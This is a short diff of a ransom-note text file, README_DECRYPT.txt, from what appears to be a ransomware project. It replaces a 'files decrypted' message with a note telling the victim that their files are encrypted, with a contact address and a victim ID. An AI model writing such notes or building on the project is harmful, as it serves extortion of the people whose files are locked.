GalH69/ransomware-trojan/README_DECRYPT.txt

-    🔓 All your files have been decrypted!
+    🔒 All your files have been encrypted!

-    Your system is no longer encrypted and your files are back to normal.
+    To get the key and decrypt your files, you must contact us.

+    Contact: hackers@example.com
+    Your victim ID: 142739ddd